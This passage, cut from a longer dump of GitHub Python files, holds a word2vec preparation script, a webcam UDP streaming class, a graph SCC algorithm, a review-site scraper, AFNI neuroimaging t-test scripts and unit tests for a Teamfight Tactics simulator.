of the text we look at\nseed = 1\n\n# default is 5, we keep the default because increasing the number\n# of epochs dramatically increases the training time, but also gives\n# better results.\nepochs = 5\n\n# ------------------------\n\n\n@yaspin(text=\"Cleaning comments...\")\ndef clean_comments(comments):\n comments = comments.apply(lambda c: nlp(c))\n comments = comments.apply(lambda doc: doc if doc.text != \"\" else np.nan)\n return comments\n\n\n@yaspin(text=\"Dumping dataset...\")\ndef dump_dataset(df):\n df.to_csv(path.join(run_dir, filename_dataset_clean), header=True)\n\n\n@yaspin(text=\"Training Word2vec...\")\ndef train_word2vec(\n sentences,\n sg=1,\n size=num_features,\n min_count=min_word_count,\n seed=seed,\n window=window_size,\n sample=downsampling,\n iter=epochs,\n):\n model = Word2Vec(\n sentences,\n sg=sg,\n size=size,\n min_count=min_count,\n seed=seed,\n window=window,\n workers=num_workers,\n sample=sample,\n iter=iter,\n )\n\n return model\n\n\n@yaspin(text=\"Saving model...\")\ndef save_model(model, filename):\n model_path = path.join(run_dir, filename)\n model.save(model_path)\n\n\n@yaspin(text=\"Plotting word embeddings...\")\ndef plot_embeddings(model, df, filename):\n tsne_plot(model, df, filename)\n\ndf[\"comments_orig\"] = df[\"comments\"]\ndf[\"comments\"] = clean_comments(df[\"comments\"])\n\n# remove corrupted rows (mostly comments that are written in languages other than English)\ndf = df.dropna()\n\nn_observations = df.shape[0]\nn_observations_r = round_down(n_observations)\n\nrun_dir = path.join(out_dir, str(n_observations_r))\n\nif not path.exists(run_dir):\n makedirs(run_dir)\n\nprint(\"Observations: {}\".format(n_observations))\n\ncomments = df[\"comments\"].map(lambda doc: [token.text for token in doc])\n\nif train:\n model_comments = train_word2vec(comments)\n save_model(model_comments, \"word2vec_comments.model\")\n print(\"Size Vocabulary (Comments):\", len(model_comments.wv.vocab))\n\n if visualize:\n plot_embeddings(model_comments, df, path.join(run_dir, \"word2vec_comments.png\"))\n\nasts = df[\"ast\"]\nasts = asts.map(lambda ast: [token for token in ast.split(\" \")])\n\nif train:\n model_asts = train_word2vec(asts, min_count=1)\n save_model(model_asts, \"word2vec_asts.model\")\n print(\"Size Vocabulary (ASTs):\", len(model_asts.wv.vocab))\n\n if visualize:\n plot_embeddings(model_asts, df, path.join(run_dir, \"word2vec_asts.png\"))\n\ndataset_clean = df[[\"ast\", \"comments\", \"comments_orig\"]]\n\nif saveDataset:\n dump_dataset(dataset_clean)\n\nprint(\"Copying metadata\")\ncopyfile(metadata_path, path.join(run_dir, metadata_filename))\n\nprint(\"Done!\")\n","repo_name":"urish/ml-comments-gen","sub_path":"model/prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":7090,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"}
+{"seq_id":"71504760489","text":"import time\n\nimport cv2,socket,pickle,os\nimport numpy as np\nimport threading\n\nclass VideoStream:\n def __init__(self):\n self.cap = None\n self.s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1000000)\n self.user_sockets = []\n self.current_thread = None\n self.is_streaming = False\n\n def add_user(self, u_ip: str, u_port: int):\n self.user_sockets.append((u_ip, u_port))\n\n def remove_user(self, u_ip: str, u_port: int):\n t = (u_ip, u_port)\n self.user_sockets.remove(t)\n self.stop_streaming()\n\n def video_streaming(self):\n print(\"Streaming!\")\n self.is_streaming = True\n # self.cap = cv2.VideoCapture(0, cv2.CAP_DSHOW)\n self.cap = cv2.VideoCapture(0)\n while self.is_streaming:\n ret, photo = self.cap.read()\n\n if photo is None:\n continue\n ret, buffer = cv2.imencode(\".jpg\", photo, [int(cv2.IMWRITE_JPEG_QUALITY), 30])\n x_as_bytes = pickle.dumps(buffer)\n for u_ip, u_port in self.user_sockets:\n self.s.sendto((x_as_bytes), (u_ip, u_port))\n\n def start_stream(self, u_ip: str, u_port: int):\n if not self.user_sockets:\n self.current_thread = threading.Thread(target=self.video_streaming)\n self.current_thread.start()\n\n self.add_user(u_ip, u_port)\n\n def stop_streaming(self, force=False):\n time.sleep(0.1)\n if force or not self.user_sockets:\n self.is_streaming = False\n self.cap.release()\n print(\"stopped streaming from class\")\n\n\n\n\n","repo_name":"DoronMaor/MyGardenGenie","sub_path":"trash/VideoStreaming/VideoStream.py","file_name":"VideoStream.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"27685599634","text":"###################################\r\n#\t\t\t\t\t\t\t\t #\r\n#\t\tAuthor : Dhananjay\t\t #\r\n#\t\t\t\t IIT Gandhinagar #\r\n#\t\t\t\t\t\t\t\t #\r\n###################################\r\n\r\n# Finding strongly connected components(SSC) in directed graph\r\n# Extension of dfs \t\t\t\t\t - \t\tO(V+E)\r\n\r\nfrom collections import defaultdict\r\nUNVISITED = 0\r\nEXPLORED = 1\r\nVISITED = 2\r\n\r\ndef SSC(u):\r\n\tglobal dfsNumber, sscNumber\r\n\tdfs_low[u] = dfs_num[u] = dfsNumber\r\n\tdfsNumber += 1\r\n\tvisited[u] = VISITED\r\n\tstc.append(u)\r\n\t\r\n\tfor v,w in AdjList[u]:\r\n\t\tif dfs_num[v] == UNVISITED:\r\n\t\t\tSSC(v)\r\n\t\tif visited[v]:\r\n\t\t\tdfs_low[u] = min(dfs_low[u], dfs_low[v])\r\n\t\r\n\tif dfs_low[u] == dfs_num[u]:\r\n\t\tsscNumber += 1 \r\n\t\tprint(\"SSC\", sscNumber,\":\", end = \" \")\r\n\t\twhile True:\r\n\t\t\tv = stc.pop()\r\n\t\t\tvisited[v] = UNVISITED\r\n\t\t\tprint(v, end = \" \")\r\n\t\t\tif u == v:\r\n\t\t\t\tbreak\r\n\t\tprint()\r\n\r\n\r\nAdjList = defaultdict(list)\r\n# Graph for which we will create AdjList.\r\n#\r\n# 7 5 9 1\r\n#\t0 ------> 1 ---> 2 ------> 4 ---> 5\r\n#\t\t ^ /\t\t ^ |\r\n#\t\t 8| / 5\t 5|\t | 3\r\n#\t\t | /\t\t |\t |\r\n# |v \t | 3 v \r\n# 3 \t 6 <--- 7\r\nAdjList = {0 : [[1,7]],\r\n\t\t 1 : [[2,5]],\r\n\t\t 2 : [[3,5],[4,9]],\r\n\t\t 3 : [[1,8]],\r\n\t\t 4 : [[5,1]],\r\n\t\t 5 : [[7,3]],\r\n\t\t 6 : [[4,5]],\r\n\t\t 7 : [[6,3]]}\r\nV = len(AdjList)\r\ndfs_num = [UNVISITED]*V\r\ndfs_low = [UNVISITED]*V\r\nvisited = [UNVISITED]*V\r\nstc = []\r\ndfsNumber = 0\r\nsscNumber = 0\r\n\r\nfor i in range(V):\r\n\tif dfs_num[i] == UNVISITED:\r\n\t\tSSC(i)\r\n","repo_name":"dhananjay1210/Data-Structures","sub_path":"graph/8.graph_SSC.py","file_name":"8.graph_SSC.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"30257054138","text":"import requests\nfrom bs4 import BeautifulSoup\n\nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n\ndef get_pages(idx):\n url = \"https://editorial.rottentomatoes.com/publications\"\n response = requests.get(url, params = {'wpv_view_count': '52769-TCPID52767', 'wpv_paged': idx}, headers = headers)\n html = response.text\n soup = BeautifulSoup(html, \"html.parser\")\n\n headlines = soup.select('a.article_headline')\n publishers = soup.select('a.unstyled.bold')\n date = soup.select('.subtle.small')\n\n output_hl = []\n output_pub = []\n output_date = []\n\n # for title in headlines:\n # output.append(title.text.strip())\n\n # print(len(headlines))\n # print(len(publishers))\n # print(len(date))\n\n for i in range(0, len(headlines)):\n output_hl.append(headlines[i].text.strip())\n output_pub.append(publishers[i].text.strip())\n output_date.append(date[i].text.strip())\n\n return output_hl, output_pub, output_date\n\nfor j in range(1,100):\n result_hl, result_pub, result_date = get_pages(j)\n for i in range(0,len(result_hl)):\n print(result_hl[i])\n print(result_pub[i])\n print(result_date[i])\n","repo_name":"pondjames007/DetourningTheWeb","sub_path":"hw2_grabLongList/hw2.py","file_name":"hw2.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"25292683241","text":"import os\nimport pickle\nimport numpy as np\nimport pandas as pd\nimport nibabel as nib\n\nfrom fg_config import *\nfrom bids_model import bids_events\n\nfrom nilearn.input_data import NiftiMasker\nfrom nilearn.image import new_img_like\nfrom collections import OrderedDict\nfrom scipy.stats import ttest_1samp, ttest_ind, wilcoxon\n\nconditions = {'CS+': 'CSp',\n 'CS-': 'CSm'}\nphases = ['acquisition','extinction']\n\nmasker = NiftiMasker(mask_img=std_2009_brain_mask_3mm)\nmasker.fit()\n\n\ndef sub_imgs():\n\n std = nib.load(std_2009_brain_mask_3mm)\n for sub in all_sub_args:\n print(sub)\n subj = bids_meta(sub)\n out = f'{subj.rsa}/ers_sl_imgs'\n mkdir(out)\n\n with open(os.path.join(subj.rsa,'sl_er.p'),'rb') as file:\n mat = pickle.load(file)\n mat = new_img_like(std_2009_brain_3mm,mat)#need this for the inverse to work\n mat = masker.transform(mat)\n\n df = pd.read_csv(os.path.join(subj.rsa,'fs_mask_roi_ER.csv'))\n df = df[df.roi == 'sgACC'].reset_index(\n ).rename(columns={'index':'trial_num'}\n ).drop(columns=['roi','rsa']\n ).set_index(['encode_phase','trial_type']\n ).sort_index(\n ).dropna(subset=['response'])#sets us up to use .loc for stability\n\n for phase in phases:\n for con in conditions:\n est = mat[df.loc[(phase,con),'trial_num'].values,:].mean(axis=0)\n est = new_img_like(std,masker.inverse_transform(est).get_fdata(),copy_header=True)#need this for the header\n nib.save(est,f'{out}/{phase}_{conditions[con]}.nii.gz')\n\n #lets also do the subtraction i guess\n for phase in phases:\n csp = mat[df.loc[(phase,'CS+'),'trial_num'].values,:].mean(axis=0)\n csm = mat[df.loc[(phase,'CS-'),'trial_num'].values,:].mean(axis=0)\n est = csp - csm\n est = new_img_like(std,masker.inverse_transform(est).get_fdata(),copy_header=True)#need this for the header\n nib.save(est,f'{out}/{phase}_diff.nii.gz')\n\ndef one_samp_ttest(subs=None,phase=None,name=''):\n out_parent = '/scratch/05426/ach3377/searchlight/ers_comps'\n out_dir = f'/scratch/05426/ach3377/searchlight/ers_comps/{name}_{phase}'\n mkdir(out_dir)\n \n setA = ''\n for s, sub in enumerate(subs):\n setA += f'{bids_meta(sub).rsa}/ers_sl_imgs/{phase}_diff.nii.gz '\n \n n_cors = 'export OMP_NUM_THREADS=48'\n cd_cmd = f'cd {out_dir}'\n clustsim_cmd = f'3dttest++ -setA {setA} \\\n -Clustsim 48 \\\n -mask {gm_3mm_thr} \\\n -prefix {name}_{phase}_clst-ttest'\n \n script = f'{out_dir}/ttest_script.txt'\n os.system(f'rm {script}')\n \n for cmd in [n_cors, cd_cmd, clustsim_cmd]:\n os.system(f\"echo {cmd} >> {script}\")\n \n jobfile = f'/home1/05426/ach3377/gPPI/jobs/{name}_sl_ers_job.txt'\n os.system(f'rm {jobfile}')\n\n #not run here, just submiting a job\n os.system(f'echo singularity run --cleanenv \\\n /scratch/05426/ach3377/bids-apps/neurosft.simg \\\n bash -x {script} >> {jobfile}')\n\n os.system(f'launch -N 1 \\\n -n 1 \\\n -J 3dttest++ \\\n -s {jobfile} \\\n -m achennings@utexas.edu \\\n -p normal \\\n -r 0:05:00 \\\n -A LewPea_MRI_Analysis')\none_samp_ttest(subs=sub_args,phase='acquisition',name='healthy')\none_samp_ttest(subs=sub_args,phase='extinction',name='healthy')\none_samp_ttest(subs=p_sub_args,phase='acquisition',name='ptsd')\none_samp_ttest(subs=p_sub_args,phase='extinction',name='ptsd')\n\ndef paired_ttest(subs=None,name=''):\n out_parent = '/scratch/05426/ach3377/searchlight/ers_comps'\n out_dir = f'/scratch/05426/ach3377/searchlight/ers_comps/{name}'\n mkdir(out_dir)\n \n setA = ''\n setB = ''\n for s, sub in enumerate(subs):\n subj = bids_meta(sub)\n setA += f'{subj.rsa}/ers_sl_imgs/extinction_diff.nii.gz '\n setB += f'{subj.rsa}/ers_sl_imgs/acquisition_diff.nii.gz '\n\n n_cors = 'export OMP_NUM_THREADS=48'\n cd_cmd = f'cd {out_dir}'\n clustsim_cmd = f'3dttest++ -setA {setA} \\\n -setB {setB} \\\n -AminusB \\\n -paired \\\n -Clustsim 48 \\\n -mask {gm_3mm_thr} \\\n -prefix {name}_clst-ttest'\n \n script = f'{out_dir}/ttest_script.txt'\n os.system(f'rm {script}')\n \n for cmd in [n_cors, cd_cmd, clustsim_cmd]:\n os.system(f\"echo {cmd} >> {script}\")\n \n #run it\n os.system(f'singularity run --cleanenv \\\n /scratch/05426/ach3377/bids-apps/neurosft.simg \\\n bash -x {script}')\npaired_ttest(subs=sub_args,name='healthy_phase_diff')\npaired_ttest(subs=p_sub_args,name='ptsd_phase_diff')\n\ndef ind_ttest(phase=None,name=''):\n out_parent = '/scratch/05426/ach3377/searchlight/ers_comps'\n out_dir = f'/scratch/05426/ach3377/searchlight/ers_comps/{name}'\n mkdir(out_dir)\n \n setA = ''\n setB = ''\n for sub in sub_args:\n subj = bids_meta(sub)\n setA += f'{subj.rsa}/ers_sl_imgs/{phase}_diff.nii.gz '\n \n for sub in p_sub_args:\n subj = bids_meta(sub)\n setB += f'{subj.rsa}/ers_sl_imgs/{phase}_diff.nii.gz '\n \n n_cors = 'export OMP_NUM_THREADS=48'\n cd_cmd = f'cd {out_dir}'\n clustsim_cmd = f'3dttest++ -setA {setA} \\\n -setB {setB} \\\n -AminusB \\\n -Clustsim 48 \\\n -mask {gm_3mm_thr} \\\n -prefix {name}_clst-ttest'\n \n script = f'{out_dir}/ttest_script.txt'\n os.system(f'rm {script}')\n \n for cmd in [n_cors, cd_cmd, clustsim_cmd]:\n os.system(f\"echo {cmd} >> {script}\")\n \n #run it\n os.system(f'singularity run --cleanenv \\\n /scratch/05426/ach3377/bids-apps/neurosft.simg \\\n bash -x {script}')\nind_ttest(phase='acquisition',name='acq_group_diff')\nind_ttest(phase='extinction',name='ext_group_diff')\n\ndef ers_cluster(contrast=None,thr=0,nvox=0,mask='../../standard/gm_3mm_thr.nii.gz',tail=None):\n here = os.getcwd()\n folder = contrast\n name = contrast.split('/')[-1]\n os.chdir(folder)\n \n if tail == 'one-sided':\n side = '1sided RIGHT_TAIL'\n elif tail == 'two-sided':\n side = '2sided'\n\n cmap = f'{name}_ClusterMap.nii.gz';os.system(f'rm {cmap}')\n ceff = f'{name}_ClusterEffEst.nii.gz';os.system(f'rm {ceff}')\n\n ctxt = f'{name}_cluster.txt';os.system(f'rm {ctxt}')\n where = f'{name}_where.txt';os.system(f'rm {where}')\n \n cmd = f\"3dClusterize -inset {name}_clst-ttest+orig \\\n -ithr 1 \\\n -idat 0 \\\n -mask {mask} \\\n -NN 3 \\\n -{side} p={thr} \\\n -clust_nvox {nvox} \\\n -pref_map {cmap} \\\n -pref_dat {ceff} > {ctxt}\"\n\n \n os.system(cmd)\n \n if os.path.exists(f'{name}_ClusterMap.nii.gz'):\n w_cmd = f\"whereami -coord_file {ctxt}'[13,14,15]' > {where}\"\n os.system(w_cmd)\n \n\n os.chdir(here)\n\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/healthy_acquisition',thr=0.001,nvox=20,tail='one-sided')#20\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/healthy_extinction',thr=0.001,nvox=20,tail='one-sided')#20\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/ptsd_acquisition',thr=0.001,nvox=20,tail='one-sided')#20\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/ptsd_extinction',thr=0.001,nvox=21,tail='one-sided')#21\n\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/healthy_phase_diff',thr=0.001,nvox=16,tail='two-sided')\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/ptsd_phase_diff',thr=0.001,nvox=18,tail='two-sided')\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/acq_group_diff',thr=0.001,nvox=21,tail='two-sided')\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/ext_group_diff',thr=0.001,nvox=20,tail='two-sided')\n\n# 3dClusterize -inset healthy_CSpE__CSpA_clst-ttest+tlrc -ithr 1 -idat 0 -mask /scratch/05426/ach3377/standard/gm_1mm_thr.nii.gz -NN 2 -2sided p=0.01 -clust_nvox 498 -pref_map healthy_CSpE__CSpA_ClusterMap.nii.gz -pref_dat healthy_CSpE__CSpA_ClusterEffEst.nii.gz > healthy_CSpE__CSpA_cluster.txt\n","repo_name":"dunsmoorlab/gPPI","sub_path":"afni_sl_stats.py","file_name":"afni_sl_stats.py","file_ext":"py","file_size_in_byte":8617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"343678477","text":"from Simulator.player import Player\nfrom Simulator.pool import pool\nfrom Simulator.champion import champion\nfrom Simulator import champion as c_object\nfrom Simulator.item_stats import trait_items, starting_items\nfrom Simulator.origin_class_stats import origin_class\n\n\ndef setup(player_num=0) -> Player:\n \"\"\"Creates fresh player and pool\"\"\"\n base_pool = pool()\n player1 = Player(base_pool, player_num)\n return player1\n\n\ndef azir_test():\n p1 = setup()\n p1.gold = 1000\n p1.max_units = 4\n p1.buy_champion(champion('azir'))\n p1.move_bench_to_board(0, 0, 0)\n coords = p1.board[0][0].sandguard_overlord_coordinates\n assert p1.board[coords[0][0]][coords[0][1]].name == 'sandguard'\n assert p1.board[coords[1][0]][coords[1][1]].name == 'sandguard'\n p1.move_board_to_board(1, 1, 5, 3)\n assert [5, 3] in p1.board[0][0].sandguard_overlord_coordinates\n p1.move_board_to_bench(0, 0)\n for x in range(7):\n for y in range(4):\n assert p1.board[x][y] is None\n\n p1.buy_champion(champion('azir'))\n p1.move_bench_to_board(0, 0, 0)\n coords = p1.board[0][0].sandguard_overlord_coordinates\n assert p1.board[coords[0][0]][coords[0][1]].name == 'sandguard'\n assert p1.board[coords[1][0]][coords[1][1]].name == 'sandguard'\n assert p1.num_units_in_play == 1\n p1.sell_champion(p1.board[0][0])\n for x in range(7):\n for y in range(4):\n assert p1.board[x][y] is None\n\n\ndef chosen_test():\n p1 = setup()\n p1.gold = 1000\n p1.max_units = 4\n p1.buy_champion(champion('leesin', chosen='duelist'))\n assert p1.chosen == 'duelist'\n p1.move_bench_to_board(0, 0, 0)\n assert p1.team_tiers['duelist'] == 1\n p2 = setup()\n p2.gold = 1000\n p2.max_units = 4\n p1.buy_champion(champion('leesin'))\n p1.buy_champion(champion('leesin'))\n assert p1.board[0][0].chosen == 'duelist'\n\ndef end_of_turn_actions_test():\n p1 = setup()\n p1.gold = 1000\n p1.max_units = 3\n for _ in range(8):\n p1.buy_champion(champion('leesin'))\n p1.move_bench_to_board(0, 0, 0)\n p1.buy_champion(champion('nami'))\n p1.move_bench_to_board(0, 1, 0)\n p1.add_to_item_bench('duelists_zeal')\n p1.move_item(0, 1, 0)\n p1.end_turn_actions()\n assert p1.bench[1] is None\n assert p1.bench[2] is not None\n assert p1.team_tiers['duelist'] == 1\n\ndef championDuplicatorTest():\n p1 = setup()\n p1.gold = 1000\n p1. max_units = 10\n p1.buy_champion(champion('leesin'))\n for x in range(4):\n p1.add_to_item_bench('champion_duplicator')\n p1.move_item(0, 0, -1)\n assert p1.item_bench[0] is None\n assert p1.bench[1].name == 'leesin'\n p1.move_bench_to_board(0, 0, 0)\n p1.move_item(1, 0, 0)\n print(p1.bench)\n assert p1.board[0][0].stars == 2\n assert p1.gold == 995\n p1.buy_champion(champion('jax'))\n p1.move_bench_to_board(0, 1, 0)\n p1.move_item(2, 1, 0)\n assert p1.bench[0].name == 'jax'\n p1.buy_champion(champion('nami'))\n p1.buy_champion(champion('aphelios'))\n p1.buy_champion(champion('vayne'))\n p1.buy_champion(champion('vi'))\n p1.buy_champion(champion('warwick'))\n p1.buy_champion(champion('teemo'))\n p1.buy_champion(champion('thresh'))\n p1.buy_champion(champion('talon'))\n p1.move_item(3, 3, -1)\n assert p1.item_bench[3] == 'champion_duplicator'\n for x in range(8):\n p1.sell_from_bench(x)\n assert p1.bench[x] is None\n\ndef magneticRemoverTest():\n p1 = setup()\n p1.gold = 1000\n p1.max_units = 10\n p1.buy_champion(champion('leesin'))\n p1.buy_champion(champion('jax'))\n p1.move_bench_to_board(0, 0, 0)\n p1.add_to_item_bench('magnetic_remover')\n p1.add_to_item_bench('magnetic_remover')\n p1.add_to_item_bench('mages_cap')\n for x in range(5):\n p1.add_to_item_bench('deathblade')\n for x in range(2, 5):\n p1.move_item(x, 0, 0)\n for x in range(5, 8):\n p1.move_item(x, 1, -1)\n assert p1.team_composition['mage'] != 0\n p1.move_item(0, 0, 0)\n p1.move_item(1, 1, -1)\n assert p1.team_composition['mage'] == 0\n assert p1.board[0][0].items == []\n assert p1.bench[1].items == []\n\ndef reforgerTest():\n p1 = setup()\n p1.gold = 1000\n p1.max_units = 10\n for x in range(3):\n p1.add_to_item_bench('reforger')\n p1.buy_champion(champion('leesin'))\n p1.buy_champion(champion('jax'))\n p1.buy_champion(champion('nami'))\n p1.add_to_item_bench('sunfire_cape')\n p1.add_to_item_bench('redemption')\n p1.add_to_item_bench('bf_sword')\n p1.add_to_item_bench('spatula')\n p1.add_to_item_bench('elderwood_heirloom')\n p1.add_to_item_bench('thieves_gloves')\n p1.move_bench_to_board(0, 0, 0)\n p1.move_item(3, 0, 0)\n p1.move_item(4, 0, 0)\n p1.move_item(5, 0, 0)\n p1.move_item(0, 0, 0)\n assert len(p1.board[0][0].items) == 0\n assert p1.item_bench[0] is None\n p1.move_item(6, 1, -1)\n p1.move_item(7, 1, -1)\n p1.move_item(8, 2, -1)\n p1.move_item(1, 1, -1)\n p1.move_item(2, 2, -1)\n test1 = False\n test2 = False\n test3 = False\n test4 = False\n for x in range(9):\n if p1.item_bench[x] == 'reforger':\n test1 = True\n if p1.item_bench[x] == 'spatula':\n test2 = True\n if p1.item_bench[x] in list(trait_items.values()):\n test3 = True\n if p1.item_bench[x] in starting_items:\n test4 = True\n assert not test1\n assert test2\n assert test3\n assert test4\n\ndef thiefsGloveCombatTest():\n p1 = setup()\n p1.gold = 1000\n p1.max_units = 1\n p2 = setup()\n p2.gold = 1000\n p2.max_units = 1\n p1.buy_champion(champion('nami'))\n p2.buy_champion(champion('nami'))\n p1.add_to_item_bench('thieves_gloves')\n p2.add_to_item_bench('thieves_gloves')\n p1.move_bench_to_board(0, 0, 0)\n p2.move_bench_to_board(0, 0, 0)\n p1.move_item(0, 0, 0)\n p2.move_item(0, 0, 0)\n p1.add_to_item_bench('deathblade')\n p1.move_item(0, 0, 0)\n assert p1.item_bench[0] == 'deathblade'\n c_object.run(c_object.champion, p1, p2)\n assert p1.board[0][0].items[0] == 'thieves_gloves'\n\ndef thiefsGlovesTest():\n p1 = setup()\n p1.gold = 1000\n p1.max_units = 1\n p1.buy_champion(champion('azir'))\n p1.buy_champion(champion('garen'))\n p1.add_to_item_bench('thieves_gloves')\n p1.move_bench_to_board(0, 0, 0)\n p1.move_item(0, 0, 0)\n assert p1.board[0][0].items[0] == 'thieves_gloves'\n for x in range(3):\n p1.start_round(x)\n p1.move_board_to_board(0, 0, 6, 3)\n p1.start_round(3)\n p1.move_board_to_bench(6, 3)\n p1.start_round(4)\n p1.sell_from_bench(0)\n p1.buy_champion(champion('azir'))\n p1.move_item(0, 0, -1)\n p1.start_round(5)\n\ndef kaynTests():\n p1 = setup()\n p2 = setup(1)\n p1.gold = 500\n p2.gold = 500\n p1.max_units = 10\n p2.max_units = 10\n p1.buy_champion(champion('kayn'))\n p1.move_bench_to_board(0, 0, 0)\n for x in range(3):\n p1.start_round(x)\n p2.start_round(x)\n p2.buy_champion(champion('kayn'))\n p2.move_bench_to_board(0, x, 0)\n assert p1.kayn_transformed, 'Kayn should transform after his third round in combat'\n assert not p2.kayn_transformed\n assert p1.item_bench[0] == 'kayn_shadowassassin'\n assert p1.item_bench[1] == 'kayn_rhast'\n p2.start_round(3)\n assert p2.kayn_transformed\n p1.move_item(0, 0, 0)\n assert p2.item_bench[0] == 'kayn_shadowassassin'\n assert p2.item_bench[1] == 'kayn_rhast'\n for x in range(7):\n for y in range(4):\n if p2.board[x][y]:\n p2.move_item(1, x, y)\n break\n assert p1.kayn_form == 'kayn_shadowassassin'\n assert p2.kayn_form == 'kayn_rhast'\n p1.buy_champion(champion('kayn'))\n assert p1.bench[0].kayn_form == 'kayn_shadowassassin'\n for x in range(10):\n assert not p1.item_bench[x]\n\ndef level2Champion():\n \"\"\"Creates 3 Zileans, there should be 1 2* Zilean on bench\"\"\"\n p1 = setup()\n p1.gold = 100000\n p1.max_units = 10\n for x in range(3):\n p1.buy_champion(champion(\"zilean\"))\n assert p1.bench[0].stars == 2, \"champion should be 2*\"\n for x in range(1, 9):\n assert p1.bench[x] is None, \"these slot should be empty\"\n for x in p1.board:\n for y in x:\n assert y is None, \"the board should be empty\"\n\n\ndef level3Champion():\n \"\"\"Creates 9 Zileans, there should be 1 3* Zilean on bench\"\"\"\n p1 = setup()\n p1.gold = 100000\n p1.max_units = 1000\n for x in range(3):\n p1.buy_champion(champion(\"zilean\"))\n assert p1.bench[0].stars == 2\n for x in range(3):\n p1.buy_champion(champion(\"zilean\"))\n assert p1.bench[1].stars == 2\n for x in range(3):\n p1.buy_champion(champion(\"zilean\"))\n assert p1.bench[0].stars == 3, \"champion should be 3*\"\n for x in range(1, 9):\n assert p1.bench[x] is None, \"this slot should be empty\"\n for x in p1.board:\n for y in x:\n assert y is None, \"the board should be empty\"\n\n\ndef levelChampFromField():\n \"\"\"buy third copy while 1 copy on field\"\"\"\n p1 = setup()\n p1.gold = 100000\n p1.max_units = 1000\n p1.buy_champion(champion(\"zilean\"))\n p1.buy_champion(champion(\"zilean\"))\n p1.move_bench_to_board(1, 0, 0)\n p1.buy_champion(champion(\"zilean\"))\n for x in p1.bench:\n assert x is None, \"bench should be empty\"\n assert p1.board[0][0].stars == 2, \"the unit placed on the field should be 2*\"\n\n\n# Please expand on this test or add additional tests here.\n# I am sure there are some bugs with the level cutoffs for example\n# Like I do not think I am hitting level 3 on the correct round without buying any exp\ndef buyExp():\n p1 = setup()\n p1.level_up()\n lvl = p1.level\n while p1.level < p1.max_level:\n p1.exp = p1.level_costs[p1.level + 1]\n p1.level_up()\n lvl += 1\n assert lvl == p1.level\n\n\ndef spamExp():\n \"\"\"buys tons of experience\"\"\"\n p1 = setup()\n p1.gold = 100000\n for _ in range(1000):\n p1.buy_exp()\n assert p1.level == p1.max_level, \"I should be max level\"\n assert p1.exp == 0, \"I should not have been able to buy experience after hitting max lvl\"\n\n\ndef incomeTest1():\n \"\"\"first test for gold income\"\"\"\n p1 = setup()\n p1.gold = 15\n p1.gold_income(5)\n assert p1.gold == 21, f\"Interest calculation is messy, gold should be 21, it is {p1.gold}\"\n\n\ndef incomeTest2():\n \"\"\"Check for income cap\"\"\"\n p1 = setup()\n p1.gold = 1000\n p1.gold_income(5)\n assert p1.gold == 1010, f\"Interest calculation is messy, gold should be 1010, it is {p1.gold}\"\n\n\ndef incomeTest3():\n \"\"\"Checks win streak gold\"\"\"\n p1 = setup()\n p1.gold = 0\n p1.win_streak = 0\n p1.gold_income(5)\n assert p1.gold == 5, f\"Interest calculation is messy, gold should be 5, it is {p1.gold}\"\n p1.gold = 0\n p1.win_streak = 1\n p1.gold_income(5)\n assert p1.gold == 5, f\"Interest calculation is messy, gold should be 5, it is {p1.gold}\"\n p1.gold = 0\n p1.win_streak = 2\n p1.gold_income(5)\n assert p1.gold == 6, f\"Interest calculation is messy, gold should be 6, it is {p1.gold}\"\n p1.gold = 0\n p1.win_streak = 3\n p1.gold_income(5)\n assert p1.gold == 6, f\"Interest calculation is messy, gold should be 6, it is {p1.gold}\"\n p1.gold = 0\n p1.win_streak = 4\n p1.gold_income(5)\n assert p1.gold == 7, f\"Interest calculation is messy, gold should be 7, it is {p1.gold}\"\n p1.gold = 0\n p1.win_streak = 5\n p1.gold_income(5)\n assert p1.gold == 8, f\"Interest calculation is messy, gold should be 8, it is {p1.gold}\"\n p1.gold = 0\n p1.win_streak = 500\n p1.gold_income(5)\n assert p1.gold == 8, f\"Interest calculation is messy, gold should be 8, it is {p1.gold}\"\n\n\ndef incomeTest4():\n \"\"\"Checks loss streak gold\"\"\"\n p1 = setup()\n p1.gold = 0\n p1.loss_streak = 0\n p1.gold_income(5)\n assert p1.gold == 5, f\"Interest calculation is messy, gold should be 5, it is {p1.gold}\"\n p1.gold = 0\n p1.loss_streak = 1\n p1.gold_income(5)\n assert p1.gold == 5, f\"Interest calculation is messy, gold should be 5, it is {p1.gold}\"\n p1.gold = 0\n p1.loss_streak = 2\n p1.gold_income(5)\n assert p1.gold == 6, f\"Interest calculation is messy, gold should be 6, it is {p1.gold}\"\n p1.gold = 0\n p1.loss_streak = 3\n p1.gold_income(5)\n assert p1.gold == 6, f\"Interest calculation is messy, gold should be 6, it is {p1.gold}\"\n p1.gold = 0\n p1.loss_streak = 4\n p1.gold_income(5)\n assert p1.gold == 7, f\"Interest calculation is messy, gold should be 7, it is {p1.gold}\"\n p1.gold = 0\n p1.loss_streak = 5\n p1.gold_income(5)\n assert p1.gold == 8, f\"Interest calculation is messy, gold should be 8, it is {p1.gold}\"\n p1.gold = 0\n p1.loss_streak = 500\n p1.gold_income(5)\n assert p1.gold == 8, f\"Interest calculation is messy, gold should be 8, it is {p1.gold}\"\n\n\ndef 